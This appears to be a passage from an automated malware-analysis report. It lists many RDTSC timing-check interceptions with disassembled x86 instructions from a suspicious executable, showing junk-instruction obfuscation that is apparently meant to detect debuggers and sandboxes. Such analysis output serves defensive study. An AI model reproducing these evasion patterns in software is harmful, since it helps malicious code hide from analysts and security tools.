    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E99D41 second address: E99D9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a xor dword ptr [esp], 5816DA72h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F0BACBDA3D8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 4AF6A0ACh 0x00000030 pushad 0x00000031 pushad 0x00000032 jmp 00007F0BACBDA3E2h 0x00000037 jg 00007F0BACBDA3D6h 0x0000003d popad 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E99D9E second address: E99DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E99DA2 second address: E99DA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E99F00 second address: E99F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E99F04 second address: E99F08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9A0CF second address: E9A0D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9A1B6 second address: E9A1BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9A1BA second address: E9A1CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0BACBDA19Bh 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9A538 second address: E9A53D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9A9E3 second address: E9A9E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9AA53 second address: E9AA59 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9AA59 second address: E9AA99 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0BACBDA1A0h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebx 0x0000000e js 00007F0BACBDA1A4h 0x00000014 push eax 0x00000015 pushad 0x00000016 js 00007F0BACBDA19Ch 0x0000001c pushad 0x0000001d push edi 0x0000001e pop edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9ABCF second address: E9ABD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F0BACBDA3D6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9ABD9 second address: E9ABEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F0BACBDA196h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9AED0 second address: E9AED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9B483 second address: E9B492 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BACBDA19Bh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9B492 second address: E9B496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9B496 second address: E9B4A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9B4A4 second address: E9B4AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9CD7D second address: E9CD8B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0BACBDA196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9CD8B second address: E9CD8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9CD8F second address: E9CD9F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9D7DE second address: E9D87F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F0BACBDA3D8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov esi, dword ptr [ebp+1245715Dh] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007F0BACBDA3D8h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 0000001Ah 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 mov edi, dword ptr [ebp+122D1E4Fh] 0x0000004e push 00000000h 0x00000050 push 00000000h 0x00000052 push eax 0x00000053 call 00007F0BACBDA3D8h 0x00000058 pop eax 0x00000059 mov dword ptr [esp+04h], eax 0x0000005d add dword ptr [esp+04h], 00000019h 0x00000065 inc eax 0x00000066 push eax 0x00000067 ret 0x00000068 pop eax 0x00000069 ret 0x0000006a xchg eax, ebx 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e jmp 00007F0BACBDA3DDh 0x00000073 jnl 00007F0BACBDA3D6h 0x00000079 popad 0x0000007a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9E2C4 second address: E9E2E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0BACBDA1A6h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9ED99 second address: E9ED9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9ED9D second address: E9EDA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9EDA7 second address: E9EDEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, dword ptr [ebp+122D304Ch] 0x00000013 push 00000000h 0x00000015 mov esi, 0EF31CCDh 0x0000001a push 00000000h 0x0000001c mov esi, 09E79500h 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F0BACBDA3E1h 0x0000002b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9EDEC second address: E9EDF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9EDF2 second address: E9EDF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9EDF8 second address: E9EDFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9EDFC second address: E9EE00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9EE00 second address: E9EE1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0BACBDA1A1h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9EE1C second address: E9EE23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9F8F2 second address: E9F8F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA00DB second address: EA00E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA0A93 second address: EA0AA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA1A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA00E1 second address: EA00E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA0AA7 second address: EA0AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA00E5 second address: EA00E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA2B5F second address: EA2B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA00E9 second address: EA00FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jnc 00007F0BACBDA3D6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA4A5A second address: EA4A9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D1EA2h], edx 0x00000010 push 00000000h 0x00000012 jmp 00007F0BACBDA1A3h 0x00000017 mov ebx, 187E1928h 0x0000001c push 00000000h 0x0000001e adc ebx, 27F3A54Ah 0x00000024 mov ebx, dword ptr [ebp+122D2BEFh] 0x0000002a push eax 0x0000002b pushad 0x0000002c push edi 0x0000002d jne 00007F0BACBDA196h 0x00000033 pop edi 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA6956 second address: EA696C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jns 00007F0BACBDA3D6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA2E0F second address: EA2E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA6B3C second address: EA6B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jmp 00007F0BACBDA3E0h 0x0000000b nop 0x0000000c add bx, DC6Ah 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov edi, 6988E413h 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 add dword ptr [ebp+124751C9h], edx 0x0000002a mov eax, dword ptr [ebp+122D0D01h] 0x00000030 sub bh, FFFFFF80h 0x00000033 clc 0x00000034 push FFFFFFFFh 0x00000036 mov bh, 04h 0x00000038 nop 0x00000039 push esi 0x0000003a jmp 00007F0BACBDA3DDh 0x0000003f pop esi 0x00000040 push eax 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA6B95 second address: EA6B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA6B99 second address: EA6B9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA7C65 second address: EA7C6A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA7C6A second address: EA7C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop edi 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EADD96 second address: EADDA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F0BACBDA196h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EB0EDC second address: EB0EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EB8A28 second address: EB8A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EB8A2C second address: EB8A30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EB8A30 second address: EB8A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EB8A3B second address: EB8A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA3DBh 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EADF4D second address: EADF52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA9C26 second address: EA9C2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EA9C2C second address: EA9C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EB8D8F second address: EB8D95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC1B1C second address: EC1B20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC1B20 second address: EC1B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC1B29 second address: EC1B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0BACBDA196h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jo 00007F0BACBDA1A2h 0x00000013 jg 00007F0BACBDA19Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC1B44 second address: EC1B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [esp+04h] 0x00000008 push edi 0x00000009 jmp 00007F0BACBDA3E9h 0x0000000e pop edi 0x0000000f mov eax, dword ptr [eax] 0x00000011 pushad 0x00000012 jne 00007F0BACBDA3D8h 0x00000018 jmp 00007F0BACBDA3DFh 0x0000001d popad 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 push edx 0x00000026 pop edx 0x00000027 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC1B8B second address: EC1BA7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0BACBDA1A4h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC1CE8 second address: EC1CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC1CEC second address: EC1CF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC1DD1 second address: EC1DF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0BACBDA3E7h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC1DF0 second address: EC1DF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC1DF4 second address: EC1E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b js 00007F0BACBDA3DEh 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC1E08 second address: EC1E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov eax, dword ptr [eax] 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b ja 00007F0BACBDA196h 0x00000011 popad 0x00000012 jo 00007F0BACBDA198h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 push ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC1E2B second address: CF5EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jp 00007F0BACBDA3D8h 0x0000000b popad 0x0000000c pop eax 0x0000000d cld 0x0000000e cld 0x0000000f push dword ptr [ebp+122D0579h] 0x00000015 pushad 0x00000016 movzx edi, cx 0x00000019 jmp 00007F0BACBDA3DDh 0x0000001e popad 0x0000001f call dword ptr [ebp+122D31A9h] 0x00000025 pushad 0x00000026 sub dword ptr [ebp+122D1E1Bh], ebx 0x0000002c or dword ptr [ebp+122D1E1Bh], ecx 0x00000032 xor eax, eax 0x00000034 jnl 00007F0BACBDA3E9h 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e cld 0x0000003f mov dword ptr [ebp+122D2DEBh], eax 0x00000045 cld 0x00000046 mov esi, 0000003Ch 0x0000004b js 00007F0BACBDA3E6h 0x00000051 jmp 00007F0BACBDA3E0h 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a sub dword ptr [ebp+122D1E1Bh], eax 0x00000060 lodsw 0x00000062 jmp 00007F0BACBDA3DCh 0x00000067 add eax, dword ptr [esp+24h] 0x0000006b mov dword ptr [ebp+122D332Ch], edx 0x00000071 mov ebx, dword ptr [esp+24h] 0x00000075 pushad 0x00000076 xor dx, FF16h 0x0000007b jnl 00007F0BACBDA3E8h 0x00000081 popad 0x00000082 push eax 0x00000083 push edx 0x00000084 push eax 0x00000085 push edx 0x00000086 push esi 0x00000087 pop esi 0x00000088 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E57B39 second address: E57B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA1A7h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC5D0F second address: EC5D7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0BACBDA3E4h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b jmp 00007F0BACBDA3E7h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push ecx 0x00000014 jl 00007F0BACBDA3D6h 0x0000001a pop ecx 0x0000001b pushad 0x0000001c jmp 00007F0BACBDA3E2h 0x00000021 jmp 00007F0BACBDA3E4h 0x00000026 jno 00007F0BACBDA3D6h 0x0000002c popad 0x0000002d push edi 0x0000002e push esi 0x0000002f pop esi 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC5EC1 second address: EC5ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0BACBDA196h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC5ECB second address: EC5EF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3DAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e jnp 00007F0BACBDA3D6h 0x00000014 pop ecx 0x00000015 jmp 00007F0BACBDA3E0h 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC632E second address: EC6346 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0BACBDA196h 0x00000008 jg 00007F0BACBDA196h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnp 00007F0BACBDA19Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC6346 second address: EC6374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnl 00007F0BACBDA3E2h 0x0000000c popad 0x0000000d ja 00007F0BACBDA3F0h 0x00000013 jo 00007F0BACBDA3DAh 0x00000019 pushad 0x0000001a popad 0x0000001b push edi 0x0000001c pop edi 0x0000001d pushad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC6374 second address: EC637A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC9F4C second address: EC9F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
